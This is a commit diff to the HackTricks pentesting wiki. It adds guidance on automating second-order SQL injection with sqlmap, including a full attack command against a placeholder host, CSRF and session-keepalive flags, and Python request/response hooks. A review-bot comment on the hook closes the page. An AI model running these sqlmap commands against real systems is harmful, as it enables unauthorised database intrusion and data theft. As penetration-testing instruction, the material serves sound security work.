
Commit f1deb01

author
HackTricks News Bot
committed
Add content from: Research Update Enhanced src/pentesting-web/sql-injection/sq...
1 parent 9aabce5 commit f1deb01

1 file changed

Lines changed: 62 additions & 1 deletion

File tree

src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md

@@ -78,7 +78,68 @@ sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy
7878
# -a : Dump all
7979
```
8080

81-
{{#include ../../../banners/hacktricks-training.md}}
81+
## Useful switches in real second-order flows
82+
83+
Second-order automation usually fails because the **payload storage request works**, but the **execution request is noisy, stateful, or protected**. When that happens, the following flags are usually more useful than adding more payloads:
84+
85+
```bash
86+
sqlmap -r login.txt -p email \
87+
--second-req second.txt \
88+
--csrf-token csrf \
89+
--csrf-url https://target.tld/profile \
90+
--csrf-method POST \
91+
--live-cookies cookies.txt \
92+
--safe-req keepalive.txt \
93+
--safe-freq 1 \
94+
--string "Welcome back" \
95+
--text-only
96+
```
97+
98+
- `--csrf-token`, `--csrf-url`, `--csrf-method`: Useful when the store or trigger request needs a fresh anti-CSRF token on every attempt.
99+
- `--live-cookies`: Reload cookies before each request. Useful when a browser/Burp macro is refreshing session state in the background.
100+
- `--safe-req` and `--safe-freq`: Keep the workflow alive when the application logs you out or invalidates the session after a few failed probes.
101+
- `--string`, `--not-string`, `--regexp`, `--code`, `--text-only`: Useful when the second-order response contains banners, ads, timestamps, or user-generated junk that makes diffing unstable.
102+
103+
## When `--tamper` is not enough
82104

105+
`tamper.py` is still the easiest way to **register a payload, log out, log in again, and trigger execution**. However, on modern targets it is often cleaner to move some of the logic to **request/response hooks**:
106+
107+
- `--preprocess`: Modify the full HTTP request before it is sent. Useful when a second-order flow needs an extra nonce, an extra parameter, or header normalization.
108+
- `--postprocess`: Clean the HTTP response before sqlmap compares it. Useful when the second-order sink is wrapped in dynamic HTML and only a small fragment is stable.
109+
110+
Example request/response hooks:
111+
112+
```python
113+
#!/usr/bin/env python
114+
def preprocess(req):
115+
if req.data:
116+
req.data += b"&preview=1"
117+
```
83118

119+
```python
120+
#!/usr/bin/env python
121+
import re
122+
def postprocess(page, headers=None, code=None):
123+
page = re.sub(br"<span>Generated at .*?</span>", b"", page or b"")
124+
return page, headers, code
125+
```
126+
127+
## Important limitations
128+
129+
- Do **not assume** that `--second-req` will replay the same payload inside a `*` placeholder in the second request. If the trigger request also needs the injected value (or a derived version of it), a custom `tamper`, `--preprocess`, or a local proxy is usually required.
130+
- Do **not rely on** `--eval` for the second request. Official usage documents `--eval` for the primary request flow; if the second request also needs per-attempt mutations, handle them inside your helper scripts instead.
131+
132+
This pattern is especially useful when the payload is stored in places such as:
133+
134+
- Filenames or image metadata that are queried later
135+
- Registration/profile fields later consumed by admin panels
136+
- Sorting/filtering preferences saved server-side and replayed later
137+
- Workflow state that is only executed after a preview, export, or moderation action
138+
139+
## References
140+
141+
- [sqlmap official usage wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage)
142+
- [Second Order SQLi: Automating with sqlmap](https://jlajara.gitlab.io/Second_order_sqli)
143+
144+
{{#include ../../../banners/hacktricks-training.md}}
84145

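Review bot: the `preprocess` hook (lines 114-116 of the new file) has no condition on which request it modifies, so `&preview=1` is appended to every request that carries a body, not only the storage request; in the command shown above that also covers the `--safe-req` keep-alive, the `--csrf-url https://target.tld/profile` visit made with `--csrf-method POST`, and the `--second-req` trigger, and if any of those endpoints rejects an unexpected parameter the whole flow stalls. Suggest gating the change on the request URL, e.g. `if req.data and "/profile" in req.get_full_url():`, and stating in the bullet for `--preprocess` that the hook runs for all requests sqlmap sends, not just the injected one. The `postprocess` example matches sqlmap's `(page, headers=None, code=None)` signature, but the `page or b""` guard deserves a one-line comment explaining that `page` may be `None` and that the bytes pattern assumes a bytes body.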
0 commit comments
